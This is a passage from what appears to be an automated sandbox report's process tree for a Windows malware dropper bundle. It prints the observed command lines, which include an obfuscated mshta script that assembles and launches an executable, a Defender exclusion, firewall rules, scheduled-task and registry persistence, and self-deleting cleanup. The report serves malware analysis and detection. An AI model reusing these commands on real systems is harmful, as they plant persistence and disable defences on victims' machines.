  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:2
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2916 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=520 /prefetch:2
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=3684 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2236 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1984 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2852 /prefetch:8
[level 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  command line: "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2240 /prefetch:8
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu124078ed79bdbd5.exe
  command line: Thu124078ed79bdbd5.exe
[level 6] C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe"
[level 6] C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe"
[level 7] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c taskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe" & del C:\ProgramData\*.dll & exit
[level 8] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f
  - Kills process with taskkill
[level 6] C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe"
[level 6] C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe"
[level 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 660
  - Program crash
[level 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 676
  - Program crash
[level 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 636
  - Program crash
[level 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 700
  - Program crash
[level 7] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 828
  - Program crash
[level 6] C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe"
[level 7] C:\Windows\SysWOW64\schtasks.exe
  command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  - Creates scheduled task(s)
[level 7] C:\Windows\SysWOW64\schtasks.exe
  command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
[level 6] C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe"
[level 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
[level 7] C:\Windows\System32\netsh.exe
  command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
[level 7] C:\Windows\System32\netsh.exe
  command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
[level 7] C:\Windows\SYSTEM32\schtasks.exe
  command line: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
  - Creates scheduled task(s)
[level 7] C:\Windows\System\svchost.exe
  command line: "C:\Windows\System\svchost.exe" formal
[level 6] C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe
  command line: "C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe"
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1231d30cda84872.exe
  command line: Thu1231d30cda84872.exe
[level 6] C:\Windows\SysWOW64\cmd.exe
  command line: cmd.exe /c taskkill /f /im chrome.exe
[level 7] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill /f /im chrome.exe
  - Kills process with taskkill
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu120bfbc2443b3b5d.exe
  command line: Thu120bfbc2443b3b5d.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe
  command line: Thu125e541847539.exe
[level 6] C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp
  command line: "C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp" /SL5="$502C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT
[level 8] C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp
  command line: "C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp" /SL5="$6027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT
[level 9] C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe" ss1
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12b275ee70c7e913.exe
  command line: Thu12b275ee70c7e913.exe
[level 6] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\inst1.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
[level 8] C:\ProgramData\4842156.exe
  command line: "C:\ProgramData\4842156.exe"
[level 8] C:\ProgramData\4063449.exe
  command line: "C:\ProgramData\4063449.exe"
[level 8] C:\ProgramData\6774152.exe
  command line: "C:\ProgramData\6774152.exe"
[level 8] C:\ProgramData\1322331.exe
  command line: "C:\ProgramData\1322331.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
[level 8] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit
[level 9] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill /im Soft1WW02.exe /f
  - Kills process with taskkill
[level 9] C:\Windows\SysWOW64\timeout.exe
  command line: timeout /t 6
  - Delays execution with timeout.exe
[level 7] C:\Users\Admin\AppData\Local\Temp\4.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\4.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\setup.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 684
  - Program crash
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 836
  - Program crash
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 888
  - Program crash
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 900
  - Program crash
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 940
  - Program crash
[level 8] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1012
  - Program crash
[level 7] C:\Users\Admin\AppData\Local\Temp\8.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\8.exe"
[level 8] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -u -p 6020 -s 1528
  - Program crash
[level 7] C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
[level 8] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
[level 9] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
[level 10] C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
  command line: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
[level 11] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
[level 12] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
[level 11] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
[level 12] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
[level 13] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo "
[level 13] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
[level 13] C:\Windows\SysWOW64\msiexec.exe
  command line: msiexec -Y ..\lXQ2g.WC
[level 10] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill -f -iM "search_hyperfs_206.exe"
  - Kills process with taskkill
[level 7] C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
[level 8] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
[level 9] C:\Windows\system32\schtasks.exe
  command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
  - Creates scheduled task(s)
[level 8] C:\Users\Admin\AppData\Roaming\services64.exe
  command line: "C:\Users\Admin\AppData\Roaming\services64.exe"
[level 9] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
[level 10] C:\Windows\system32\schtasks.exe
  command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
  - Creates scheduled task(s)
[level 9] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
[level 7] C:\Users\Admin\AppData\Local\Temp\5.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\5.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
[level 8] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
[level 9] C:\Windows\SysWOW64\cmd.exe
  command line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
[level 10] C:\Windows\SysWOW64\PING.EXE
  command line: ping 1.1.1.1 -n 1 -w 3000
  - Runs ping.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
[level 5] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exe
  command line: Thu12ca1c119bc29.exe /mixone
[level 6] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu12ca1c119bc29.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12ca1c119bc29.exe" & exit
[level 7] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill /im "Thu12ca1c119bc29.exe" /f
  - Kills process with taskkill
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
  - Blocklisted process makes network request
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
[level 4] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
[level 1] C:\Windows\system32\compattelrunner.exe
  command line: C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
[level 1] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
  command line: Thu126011caea28.exe
[level 2] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
  command line: C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu126011caea28.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe
  command line: Thu12493eba7a.exe
[level 2] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
[level 3] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
[level 4] C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
  command line: yDhNY.exe /pFKkSWJQc5v2ppVFMo
[level 5] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
[level 6] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
[level 5] C:\Windows\SysWOW64\mshta.exe
  command line: "C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
[level 6] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
[level 7] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
[level 7] C:\Windows\SysWOW64\cmd.exe
  command line: C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
[level 7] C:\Windows\SysWOW64\msiexec.exe
  command line: msiexec.exe -Y .\ISA502G.S7
[level 4] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill -f -Im "Thu12493eba7a.exe"
  - Kills process with taskkill
[level 1] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12465fe68f85b6156.exe
  command line: Thu12465fe68f85b6156.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1262fd911d3e6320.exe
  command line: Thu1262fd911d3e6320.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu122f7469b214cb59.exe
  command line: Thu122f7469b214cb59.exe
[level 2] C:\Users\Admin\AppData\Roaming\4402660.exe
  command line: "C:\Users\Admin\AppData\Roaming\4402660.exe"
[level 2] C:\Users\Admin\AppData\Roaming\5912648.exe
  command line: "C:\Users\Admin\AppData\Roaming\5912648.exe"
[level 2] C:\Users\Admin\AppData\Roaming\1030691.exe
  command line: "C:\Users\Admin\AppData\Roaming\1030691.exe"
[level 2] C:\Users\Admin\AppData\Roaming\6168135.exe
  command line: "C:\Users\Admin\AppData\Roaming\6168135.exe"
[level 2] C:\Users\Admin\AppData\Roaming\3942899.exe
  command line: "C:\Users\Admin\AppData\Roaming\3942899.exe"
[level 3] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
  command line: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
[level 1] C:\Windows\system32\rundll32.exe
  command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
[level 2] C:\Windows\SysWOW64\rundll32.exe
  command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
[level 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k SystemNetworkService
[level 1] C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe
  command line: C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b
[level 2] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "ugRrXBaN9Ln.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe" & exit
[level 3] C:\Windows\SysWOW64\taskkill.exe
  command line: taskkill /im "ugRrXBaN9Ln.exe" /f
  - Kills process with taskkill
[level 1] C:\Windows\system32\rundll32.exe
  command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
[level 2] C:\Windows\SysWOW64\rundll32.exe
  command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
[level 2] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
[level 3] C:\Windows\SysWOW64\cmd.exe
  command line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
[level 4] C:\Windows\SysWOW64\PING.EXE
  command line: ping 1.1.1.1 -n 1 -w 3000
  - Runs ping.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\42ED.exe
  command line: C:\Users\Admin\AppData\Local\Temp\42ED.exe
[level 2] C:\Users\Admin\AppData\Local\Temp\42ED.exe
  command line: C:\Users\Admin\AppData\Local\Temp\42ED.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\24D2.exe
  command line: C:\Users\Admin\AppData\Local\Temp\24D2.exe
[level 1] C:\Users\Admin\AppData\Local\Temp\C5A7.exe
  command line: C:\Users\Admin\AppData\Local\Temp\C5A7.exe
[level 2] C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
[level 3] C:\Windows\SysWOW64\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
[level 4] C:\Windows\SysWOW64\reg.exe
